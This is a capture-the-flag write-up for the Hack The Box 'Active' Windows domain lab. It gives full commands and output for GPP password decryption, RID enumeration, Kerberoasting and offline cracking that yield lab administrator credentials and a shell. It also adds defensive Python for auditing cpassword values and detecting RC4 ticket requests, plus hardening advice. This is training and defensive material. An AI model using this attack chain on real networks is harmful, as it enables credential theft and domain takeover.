HackTheBox Active Directory 101, No.3, Active

Lab: Hack The Box
System: Windows
Topics: basic AD operations, GPP, Kerberoasting

A standard training box. Start with a port scan.

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  tcpwrapped
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49166/tcp open  msrpc         Microsoft Windows RPC
49167/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
|_clock-skew: -14m12s
| smb2-time:
|   date: 2024-12-12T07:21:17
|_  start_date: 2024-12-07T09:05:59

Enumerate SMB shares with a null (anonymous) session.

~/D/a $smbclient -NL $IP
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Replication     Disk
        SYSVOL          Disk      Logon server share
        Users           Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Only one uncommon share, Replication, so recursively download everything in it.

~/D/a $smbclient //$IP/Replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 10:37:44 2018
  ..                                  D        0  Sat Jul 21 10:37:44 2018
  active.htb                          D        0  Sat Jul 21 10:37:44 2018
smb: \> RECURSE on
smb: \> PROMPT off
smb: \> mget *

Inside it is a Groups.xml:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

It contains a user name, svc_tgs, together with an encrypted password. This is a Microsoft Group Policy Preferences (GPP) password.

GPP passwords are stored in the SYSVOL folder of Active Directory in a form that can be decoded: the cpassword value is AES-encrypted, but the encryption key is published in Microsoft's own documentation (MS-GPPREF), so anyone who can read SYSVOL can recover the plaintext.

~/D/a $gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
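
As an added defender-side check (example code, not part of the original writeup), the following audits GPP XML for cpassword attributes instead of decrypting them; the Groups.xml from the Replication share above is embedded as the sample input, and the account-attribute names other than userName are assumptions about the other GPP item types.

```python
# Added audit helper, not from the original writeup: walk Group Policy
# Preferences XML (Groups.xml, Services.xml, ScheduledTasks.xml, Drives.xml,
# DataSources.xml, Printers.xml under SYSVOL\<domain>\Policies) and report every
# cpassword attribute. A hit means the account's password is exposed to anyone
# who can read SYSVOL: rotate it and delete the GPP item (see MS14-025).
import base64
import binascii
import xml.etree.ElementTree as ET

# Attribute names that carry the account in the different GPP item types (assumed).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# The Groups.xml pulled from the Replication share above, embedded as sample input.
GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>"""


def find_gpp_credentials(xml_data, source="<unknown path>"):
    """Return one finding per element that carries a cpassword attribute."""
    if isinstance(xml_data, str):
        xml_data = xml_data.encode("utf-8")   # let expat honour the XML declaration
    root = ET.fromstring(xml_data)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if cpw is None:
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "<no account attr>")
        # GPP stores base64 with the '=' padding stripped; restore it so the
        # ciphertext length can be checked (AES-CBC output is whole 16-byte blocks).
        try:
            ct_len = len(base64.b64decode(cpw + "=" * (-len(cpw) % 4), validate=True))
        except binascii.Error:
            ct_len = -1
        parent = parents.get(elem)           # e.g. the <User> element holding 'changed'
        findings.append({
            "source": source,
            "item": elem.tag,
            "account": account,
            "changed": parent.get("changed") if parent is not None else None,
            "ciphertext_bytes": ct_len,
            "well_formed": ct_len > 0 and ct_len % 16 == 0,
        })
    return findings


if __name__ == "__main__":
    for f in find_gpp_credentials(GROUPS_XML, "Groups.xml (Replication share)"):
        print(f)
```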

Test what svc_tgs can access.

~/D/a $netexec smb $IP -u svc_tgs -p GPPstillStandingStrong2k18
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18

Enumerate all domain users by RID brute force.

~/D/a $netexec smb $IP -u svc_tgs -p GPPstillStandingStrong2k18 --rid-brute
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
SMB         10.10.10.100    445    DC               498: ACTIVE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.10.100    445    DC               500: ACTIVE\Administrator (SidTypeUser)
SMB         10.10.10.100    445    DC               501: ACTIVE\Guest (SidTypeUser)
SMB         10.10.10.100    445    DC               502: ACTIVE\krbtgt (SidTypeUser)
SMB         10.10.10.100    445    DC               512: ACTIVE\Domain Admins (SidTypeGroup)
SMB         10.10.10.100    445    DC               513: ACTIVE\Domain Users (SidTypeGroup)
SMB         10.10.10.100    445    DC               514: ACTIVE\Domain Guests (SidTypeGroup)
SMB         10.10.10.100    445    DC               515: ACTIVE\Domain Computers (SidTypeGroup)
SMB         10.10.10.100    445    DC               516: ACTIVE\Domain Controllers (SidTypeGroup)
SMB         10.10.10.100    445    DC               517: ACTIVE\Cert Publishers (SidTypeAlias)
SMB         10.10.10.100    445    DC               518: ACTIVE\Schema Admins (SidTypeGroup)
SMB         10.10.10.100    445    DC               519: ACTIVE\Enterprise Admins (SidTypeGroup)
SMB         10.10.10.100    445    DC               520: ACTIVE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.10.100    445    DC               521: ACTIVE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.10.100    445    DC               553: ACTIVE\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.10.100    445    DC               571: ACTIVE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.10.100    445    DC               572: ACTIVE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.10.100    445    DC               1000: ACTIVE\DC$ (SidTypeUser)
SMB         10.10.10.100    445    DC               1101: ACTIVE\DnsAdmins (SidTypeAlias)
SMB         10.10.10.100    445    DC               1102: ACTIVE\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.10.100    445    DC               1103: ACTIVE\SVC_TGS (SidTypeUser)

Log in to SMB again as svc_tgs and download the Users share, which was not readable anonymously.

~/D/a $netexec smb $IP -u svc_tgs -p GPPstillStandingStrong2k18 --shares
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
SMB         10.10.10.100    445    DC               [*] Enumerated shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.100    445    DC               C$                              Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON        READ            Logon server share
SMB         10.10.10.100    445    DC               Replication     READ
SMB         10.10.10.100    445    DC               SYSVOL          READ            Logon server share
SMB         10.10.10.100    445    DC               Users           READ

~/D/a $smbclient //$IP/Users -U 'svc_tgs%GPPstillStandingStrong2k18'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sat Jul 21 14:39:20 2018
  ..                                 DR        0  Sat Jul 21 14:39:20 2018
  Administrator                       D        0  Mon Jul 16 10:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 05:06:44 2009
  Default                           DHR        0  Tue Jul 14 06:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 05:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 04:57:55 2009
  Public                             DR        0  Tue Jul 14 04:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 15:16:32 2018

Nothing useful in the user folders. Check whether any user account has a service principal name (SPN) bound to it.

~/D/a/s $impacket-GetUserSPNs  $DOMAIN/SVC_TGS:GPPstillStandingStrong2k18  -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 19:06:40.351723  2024-12-07 11:21:48.223544

Request the service ticket (TGS) and dump its hash.

~/D/a/s $impacket-GetUserSPNs  $DOMAIN/SVC_TGS:GPPstillStandingStrong2k18  -dc-ip $IP -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 19:06:40.351723  2024-12-07 11:21:48.223544

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$15beb8c9ee1a6d1e497ca5873b10a1cf$...

Save the ticket to hash.txt and crack it offline with john. The etype 23 label means RC4-HMAC, where the ticket is encrypted under the service account's NT hash, which is why a wordlist attack on the account password works.

~/D/a/s $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:03 DONE (2024-12-12 08:57) 0.2710g/s 2855Kp/s 2855Kc/s 2855KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Cracking it yields the administrator password, which gives a shell.

~/D/a/s $netexec smb $IP -u administrator -p Ticketmaster1968
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)

~/D/a/s $impacket-wmiexec $DOMAIN/administrator:'Ticketmaster1968'@$IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator
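
As an added defensive counterpart to the Kerberoasting step (example code, not from the writeup), the following flags Windows Security event 4769 entries for RC4-encrypted service tickets on user accounts, the signal the krb5tgs$23 hash above leaves behind; the field names follow the standard 4769 schema and the sample events are constructed.

```python
# Added detection example, not from the original writeup: flag Kerberos TGS
# requests (Windows Security event 4769) that look like Kerberoasting, that is a
# service ticket for a *user* account's SPN issued with RC4-HMAC (etype 0x17),
# which is exactly what the krb5tgs$23 hash cracked above came from.
from collections import defaultdict

RC4_HMAC = "0x17"   # TicketEncryptionType for etype 23; AES tickets are 0x11/0x12


def is_roast_candidate(ev):
    """Successful RC4 TGS for a non-computer, non-krbtgt account is the base signal."""
    svc = ev["ServiceName"]
    return (ev["Status"] == "0x0"
            and ev["TicketEncryptionType"] == RC4_HMAC
            and not svc.endswith("$")          # machine accounts: random passwords, not crackable
            and svc.lower() != "krbtgt")       # krbtgt is the TGT itself, not a roastable SPN


def kerberoast_report(events, burst_threshold=3):
    """Group candidate events per requester (user, source IP) and rate them."""
    per_requester = defaultdict(set)
    for ev in events:
        if is_roast_candidate(ev):
            per_requester[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    report = []
    for (user, ip), services in sorted(per_requester.items()):
        report.append({
            "requester": user,
            "source_ip": ip,
            "rc4_user_spns": sorted(services),
            # Many distinct user SPNs from one requester in one batch is the classic
            # spray; a single one still matters in a small domain like this (one SPN).
            "severity": "high" if len(services) >= burst_threshold else "medium",
        })
    return report


# Constructed sample of parsed 4769 events; the second mirrors the request made by
# GetUserSPNs above (svc_tgs asking for Administrator's SPN), the rest is benign.
SAMPLE_4769 = [
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "DC$@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "::1", "Status": "0x0"},
    {"TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.50", "Status": "0x0"},
]

if __name__ == "__main__":
    for finding in kerberoast_report(SAMPLE_4769):
        print(finding)
```

Accounts that hold SPNs should be restricted to AES via msDS-SupportedEncryptionTypes and given long random passwords (or be gMSAs), and a privileged account such as Administrator should never carry an SPN at all.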
